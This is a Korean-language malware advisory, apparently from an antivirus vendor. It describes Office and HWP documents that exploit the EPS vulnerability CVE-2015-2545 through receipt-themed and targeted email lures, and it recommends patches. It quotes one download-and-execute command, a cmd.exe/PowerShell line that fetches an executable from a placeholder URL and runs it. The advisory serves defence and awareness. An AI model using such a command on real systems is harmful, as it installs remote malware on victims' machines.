다양한 문서파일 내부의 EPS (Encapsulated PostScript) 취약점

최근 Microsoft Office 문서와 한글 파일 내에 삽입된 EPS (Encapsulated PostScript) 개체의 취약점을 이용한 악성코드가 유포되어 사용자의 주의가 요구된다.

 

EPS (Encapsulated PostScript) 는 화면상에 그래픽 요소를 출력하는 용도로 제작된 Adobe 스크립트 언어로캡슐화된 형태를 통해 특정 개체 내에 삽입이 가능하다.

지난 2015년 해당 EPS 파일에서 발견된 CVE-2015-2545 취약점은 Microsoft Office 문서파일을 열 경우 악성코드 제작자가 제작한 임의의 코드를 실행 가능하도록 하며이후 사용자 시스템의 정보유출추가 악성코드 다운로드 등의 악의적인 기능을 수행하는 형태가 발견되고 있다.

 

해당 취약점은 EPS 파일을 처리하는 특정 모듈 내에서 발생하며메모리상에서 이미 해제된 위치를 참조하는 UAF (User-After-Free) 기법을 사용한다각 문서 포맷 별 EPS 처리모듈은 아래 [-1] 과 같다.

종류

취약점 발생 파일명

Microsoft Office

EPSIMP32.FLT

HWP

gswin32c.exe

[-1] 문서포맷 별 EPS 취약점 발생 파일명


해당 악성코드는 주로 이메일에 첨부된 문서파일 형태로 유포되며운송장이나 영수증과 같은 메일제목을 포함하고 있다사용자는 출처가 불분명한 이메일의 첨부파일은 열어보지 않도록 각별한 주의가 필요하며, [-2] 의 최신 업데이트 패치를 통해 취약점을 통한 악성코드 실행 공격을 예방할 수 있다.


[-2] 문서 뷰어 프로그램 별 최신 업데이트 링크

 

지난 10 24일 국내에서 수집된 악성코드는 Microsoft Office 워드문서로 제작되었으며아래 [그림-1] 과 같이 문서파일 내 CVE-2015-2545 취약점이 존재하는 EPS 개체가 포함되어 있다

[그림-1] Office 문서 구조의 EPS 취약점 개체가 포함된 위치

 

해당 문서 실행 시 [그림-2] 와 같이 영수증 스캔 내용이 화면에 출력되나 실제로는 취약점을 통해 악성코드 제작자가 삽입한 실행 코드가 수행된다.

[그림-2] EPS 취약점 개체가 삽입된 Office 문서의 실행화면

 

해당 문서 내 삽입된 EPS 파일에서 취약점을 발생시키는 구문은 [그림-3] 과 같으며특정 데이터 값을 메모리상에 로드하고 참조하는 과정을 통해 악성코드 제작자가 의도한 특정 메모리 영역의 코드를 실행한다.

[그림-3] EPS 파일 내 취약점 발생구간

 

취약점이 실행된 이후 사용자 시스템의 %Temp% 경로에 “igfxe.exe” 파일명으로 추가 악성코드를 생성하며파일 내 존재하는 특정 URL에서 악성코드를 다운로드 한다.

다운로드 방식은 Windows Vista 이상의 운영체제에서 기본으로 지원하는 PowerShell.exe 프로세스를 통해 실행하며아래 [-3] 과 같이 PowerShell.exe 인자값으로 사용자 명령을 입력하여 악성코드를 다운로드 하도록 한다.

cmd.exe /c “PowerShell (New-Object System.Net.WebClient).DownloadFile('https://[다운로드URL][파일명.exe],'[파일명].exe');(New-Object -com Shell.Application).ShellExecute('[파일명].exe');”

[-3] PowerShell 을 이용한 악성코드 다운로드

 

취약점을 통해 생성된 igfxe.exe 파일은 V3에서 Trojan/Win32.ZBot.C1534517 로 진단한다.

 

또한, Microsoft Office 문서뿐 아니라 국내에서 사용되는 한글 오피스를 대상으로도 동일한 EPS 취약점 문서파일이 제작되고 있다. 기존에는 한글문서 자체의 구조적 취약점을 악용한 악성코드가 제작된 것에 비해최근에는 한글문서 이외의 모듈상에 존재하는 취약점을 한글문서에 삽입함으로써 다양한 형태로의 취약점 공격이 시도되고 있다.

 

해당 EPS 개체가 삽입된 위치는 한글 문서 구조상에서 [그림-4] 와 같이 BinData 폴더 내부에 존재하며해당 폴더는 한글 문서 내에서 처리하는 이미지 파일 및 미디어 개체가 포함되는 위치이다.

[그림-4] 한글 문서 구조 내 EPS 취약점 개체가 삽입된 위치 (BIN0001.eps)

 

최근 국내에서 접수된 한글문서는 [그림-5] 와 같이 특정 이슈사항에 대한 내용을 포함하며특정인이나 특정 기관을 대상으로 이메일 첨부파일을 통해 유포하는 것으로 추정된다.

이메일에 첨부된 한글 문서파일은 사용자로 하여금 관심을 갖도록 하는 이슈와 관련되며문서 실행 후에는 최초 실행한 문서파일을 정상문서로 덮어씀으로써 이후 사용자가 감염사실을 인지하지 못하도록 한다.

[그림-5] EPS 취약점 개체가 삽입된 한글문서 실행 화면

 

취약점 한글파일 및 다운로드 된 추가 악성코드 파일은 V3에서 HWP/Exploit, TextImage/Shellcode 로 진단한다.

 

최근 EPS 취약점 개체를 이용한 형태로 다양한 종류의 문서 파일이 악의적으로 제작되고 있으며이를 통한 백도어 및 추가 악성코드의 2차 감염이 진행되고 있다.

현재 Microsoft 및 한컴에서는 해당 취약점에 대한 보안패치를 제공하였으며, 해당 문서 파일을 사용하는 시스템에서는 프로그램을 최신 버전으로 업데이트하여 이와 같은 취약점 공격에 대비하여야 한다

또한, 발신자가 불명확한 의심스러운 이메일에 첨부된 문서파일은 열어보지 않도록 각별한 주의가 요구된다

 

[참고]

Microsoft 보안 공지 MS15-099 – 긴급

https://technet.microsoft.com/ko-kr/library/security/ms15-099.aspx

Microsoft Office 잘못된 형식의 EPS 파일 취약성(CVE-2015-2545)(영문)

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2545


Categories:악성코드 정보

0 0 vote
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments